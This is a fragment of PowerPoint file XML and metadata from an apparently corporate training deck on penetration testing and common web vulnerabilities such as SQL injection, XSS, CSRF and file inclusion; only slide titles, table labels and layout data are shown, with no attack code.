          <a:ext cx="13277991" cy="628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5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B073-D7C4-7F0E-B5CE-E56BFDB1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CAE8-D5F3-207A-81BD-C1D0C0AC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9BDC-FBB8-5A07-8E1D-1FB4F03C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A569-8C1B-35ED-E952-C1ED15B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F78D48-F385-58C5-0D73-611CA2415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01602"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6765851" y="1532537"/>
          <a:ext cx="7864549" cy="628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3D1B21-ECE1-AEA2-FFCD-3B241F3E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592908"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-417190" y="1483854"/>
          <a:ext cx="7864549" cy="59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234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D242-0C19-6AE7-F7BE-6895A9D6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E77-BB31-657E-C850-CEE539FA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B5DF-ECBD-2FC0-F1A1-52CD6CE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64A1-6D60-9EB5-4C87-3FF233A3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711B84A-A1FE-D5B4-AF55-2091AE578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74881"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="731520" y="1717380"/>
          <a:ext cx="13058590" cy="43281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47885">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="833745183"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4136065">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="703184835"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3682959">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3038958150"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3291681">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="68850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太平洋保险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号百控股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Lilly </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                        <a:t>China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0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For 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MLPS</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl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Security Vendor competition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SRC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MLPS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Group Pentest</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" alt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工信部 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</a:rPr>
                        <a:t>Pentest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SRC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MLPS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 people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KPMG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0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Annally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Annally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All assets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Every Release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All assets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External system in CFC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7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33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6C12-FEBE-4A52-A5C1-52751BF2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is Vulnerability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9974F1-E663-713C-BD32-08F36367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28649"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2664179" y="1524989"/>
          <a:ext cx="10521244" cy="604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6DAB-E22D-C9F2-230E-C0DE9BC9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10C0-F0E4-3B4A-8D46-358441509B60}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0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2DAB-9170-F7D1-0C7B-97B93FCC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61DE-9D3E-5C4B-DC93-056A30DC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4A9EC-2F93-AA4A-8BF5-70DF042828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Presentation4_16-9.potx" id="{A3EECDD1-B0AE-4F2A-B605-1CB8EEA52814}" vid="{0916328E-BE80-4805-8CB6-718C62B07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56DD4EE0B0A4DBAEBE68C9E02E2DA" ma:contentTypeVersion="11" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="aca68afd43e325f4c7b42173f6847477">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="16e6069a-04c5-46f1-8e4a-493411be9f6d" xmlns:ns3="bfac00ad-cf50-4b2f-bc6d-6973bf4a0f43" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="9c265ee0aaa73d8d35901ba34b5e6d97" ns2:_="" ns3:_="">
    <xsd:import namespace="16e6069a-04c5-46f1-8e4a-493411be9f6d"/>
    <xsd:import namespace="bfac00ad-cf50-4b2f-bc6d-6973bf4a0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6069a-04c5-46f1-8e4a-493411be9f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adb9bf-65a7-4dcd-b9fe-2cabe70ed6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c00ad-cf50-4b2f-bc6d-6973bf4a0f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8066bb-f91d-4a3a-b16a-1bf240bf67a3}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="bfac00ad-cf50-4b2f-bc6d-6973bf4a0f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e6069a-04c5-46f1-8e4a-493411be9f6d">
      <Terms xmlns="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    </lcf76f155ced4ddcb4097134ff3c332f>
    <TaxCatchAll xmlns="bfac00ad-cf50-4b2f-bc6d-6973bf4a0f43" xsi:nil="true"/>
  </documentManagement>
</p:properties>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{B7A59409-6645-4EA9-9703-83B6DAA0AAF1}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="16e6069a-04c5-46f1-8e4a-493411be9f6d"/>
    <ds:schemaRef ds:uri="bfac00ad-cf50-4b2f-bc6d-6973bf4a0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81B9F2-C4B7-4040-A351-077ECC2403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3CF57E-A100-484A-9587-2A5C67B4F093}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="16e6069a-04c5-46f1-8e4a-493411be9f6d"/>
    <ds:schemaRef ds:uri="bfac00ad-cf50-4b2f-bc6d-6973bf4a0f4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CorporatePresentation4_16-9</Template>
  <TotalTime>24733</TotalTime>
  <Words>2003</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>395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Söhne</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Penetration test &amp; Vulnerability Exploitation</vt:lpstr>
      <vt:lpstr>Disclaimer</vt:lpstr>
      <vt:lpstr>Professional terms</vt:lpstr>
      <vt:lpstr>Difference – Scan &amp; Pentest</vt:lpstr>
      <vt:lpstr>Classification</vt:lpstr>
      <vt:lpstr>Process</vt:lpstr>
      <vt:lpstr>Hacker</vt:lpstr>
      <vt:lpstr>Comparison</vt:lpstr>
      <vt:lpstr>Where is Vulnerability</vt:lpstr>
      <vt:lpstr>Vulnerability lifecycle</vt:lpstr>
      <vt:lpstr>SQL injection</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting - XSS</vt:lpstr>
      <vt:lpstr>Broken access control</vt:lpstr>
      <vt:lpstr>Remote Code Execution(RCE)</vt:lpstr>
      <vt:lpstr>Upload file Vuln. &amp; Parsing Vuln.</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery - CSRF</vt:lpstr>
      <vt:lpstr>File Inclusion Vuln.</vt:lpstr>
      <vt:lpstr>Other common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MINGFENG YE - Network</dc:creator>
  <cp:lastModifiedBy>MINGFENG YE - Network</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-07-17T07:54:51Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-04T09:53:06Z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0x01010005A56DD4EE0B0A4DBAEBE68C9E02E2DA</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="Order">
    <vt:r8>18600</vt:r8>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="Category">
    <vt:lpwstr>Presentation</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="Thumbnail">
    <vt:lpwstr>, </vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="xd_Signature">
    <vt:bool>false</vt:bool>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="AspectRatio">
    <vt:lpwstr>16:9</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="10" name="xd_ProgID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Format">
    <vt:lpwstr>PowerPoint</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="16" name="Use">
    <vt:lpwstr>External and Internal</vt:lpwstr>
  </property>
</Properties>
</file>